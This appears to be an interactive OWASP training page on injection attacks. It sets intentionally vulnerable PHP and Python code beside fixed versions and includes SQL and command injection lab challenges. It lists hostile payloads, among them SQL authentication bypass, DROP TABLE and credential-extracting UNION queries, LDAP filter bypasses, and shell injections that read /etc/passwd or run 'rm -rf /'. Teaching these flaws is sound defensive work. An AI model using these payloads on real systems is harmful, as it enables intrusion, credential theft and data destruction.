OWASP Top 10 - A03 Injection Attacks

What are Injection Attacks?

Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.

🎯 Common Injection Types

SQL Injection: Manipulating database queries through user input
Command Injection: Executing arbitrary operating system commands
LDAP Injection: Exploiting LDAP queries for authentication bypass
XPath Injection: Manipulating XML path language queries
NoSQL Injection: Exploiting NoSQL database queries
CRLF Injection: Header manipulation and response splitting

⚠️ Attack Impact

Complete database compromise and data exfiltration
Authentication bypass and privilege escalation
Remote code execution on the server
System takeover and lateral movement
Data corruption and service denial
Compliance violations and legal liability

🔍 Common Attack Vectors

# SQL Injection Examples
' OR '1'='1' --           # Authentication bypass
'; DROP TABLE users; --   # Data destruction  
' UNION SELECT password FROM admin_users --  # Data extraction

# Command Injection Examples
; cat /etc/passwd         # File disclosure
| whoami                  # Command chaining
&& rm -rf /               # Destructive commands

# LDAP Injection Examples
*)(cn=*))(|(cn=*          # LDAP filter bypass
admin)(&(password=*       # Authentication bypass
                

🛡️ Prevention Strategies

Parameterized Queries: Use prepared statements with parameter binding
Input Validation: Whitelist allowed characters and patterns
Escape Output: Properly encode special characters
Least Privilege: Limit database and system permissions
WAF Implementation: Deploy Web Application Firewalls
Regular Testing: Automated security scanning and penetration testing

// Vulnerable Code (PHP)
$query = "SELECT * FROM users WHERE username = '" . $_POST['username'] . "'";
$result = mysql_query($query);

// Secure Code (PHP with PDO)
$stmt = $pdo->prepare("SELECT * FROM users WHERE username = ?");
$stmt->execute([$_POST['username']]);
$result = $stmt->fetchAll();

// Vulnerable Code (Python)
os.system("ping " + user_input)

// Secure Code (Python)
subprocess.run(["ping", user_input], shell=False)
                

💉 Lab 1: SQL Injection Attack Challenge

Scenario: You're testing a web application's login system that appears vulnerable to SQL injection. Your goals: bypass authentication and extract sensitive data from the database.

Injection Attempts: 0 | Objectives Completed: 0/3

🎯 Target Login System

Username:

Password:

💡 SQL Injection Payloads to Try:

Authentication Bypass:

admin' OR '1'='1' --

' OR 1=1 #

Data Extraction:

' UNION SELECT username,password FROM users --

' UNION SELECT table_name,column_name FROM information_schema.columns --

🔍 SQL Query Debugger

Generated SQL Query:

Query Analysis:

Objectives:

1. Bypass login authentication using SQL injection

2. Extract user credentials from the database

3. Discover hidden administrative accounts

Current Status: Ready to begin injection attempts

📊 Database Schema Discovery

TABLE: users
+----------+-------------+------+-----+---------+
| Field    | Type        | Null | Key | Default |
+----------+-------------+------+-----+---------+
| id       | int(11)     | NO   | PRI | NULL    |
| username | varchar(50) | NO   |     | NULL    |
| password | varchar(50) | NO   |     | NULL    |
| role     | varchar(20) | NO   |     | user    |
| email    | varchar(100)| YES  |     | NULL    |
+----------+-------------+------+-----+---------+

TABLE: admin_secrets
+----------+-------------+------+-----+---------+
| Field    | Type        | Null | Key | Default |
+----------+-------------+------+-----+---------+
| id       | int(11)     | NO   | PRI | NULL    |
| secret   | text        | NO   |     | NULL    |
| access_level | int(1)  | NO   |     | 1       |
+----------+-------------+------+-----+---------+

🚨 SQL Injection Vulnerability Analysis

This application is vulnerable because it:

String Concatenation: Builds SQL queries by concatenating user input
No Input Validation: Accepts any characters including SQL metacharacters
Excessive Privileges: Database user has access to all tables
Error Disclosure: Shows SQL errors that help attackers

⚡ Lab 2: OS Command Injection Challenge

Scenario: You've found a network diagnostic tool that allows users to ping hosts. The application appears to execute system commands directly. Exploit this to gain unauthorized system access.

Command Attempts: 0 | System Access Level: User

🌐 Network Diagnostic Tool

Target Host/IP:

Ping Options:

💡 Command Injection Payloads:

Command Chaining:

google.com; whoami

google.com && cat /etc/passwd

Output Redirection:

google.com | ls -la

google.com; find / -name "*.conf" 2>/dev/null

💻 Command Terminal

Welcome to SecureNet Diagnostic Tool v2.1

Enter commands above to begin network diagnostics...

====================================

Mission Objectives:

1. Execute basic system commands (whoami, pwd, ls)

2. Access sensitive system files (/etc/passwd, /etc/hosts)

3. Discover system configuration and running processes

Escalation Target: Find the flag in /var/secrets/flag.txt

🚨 Command Injection Vulnerability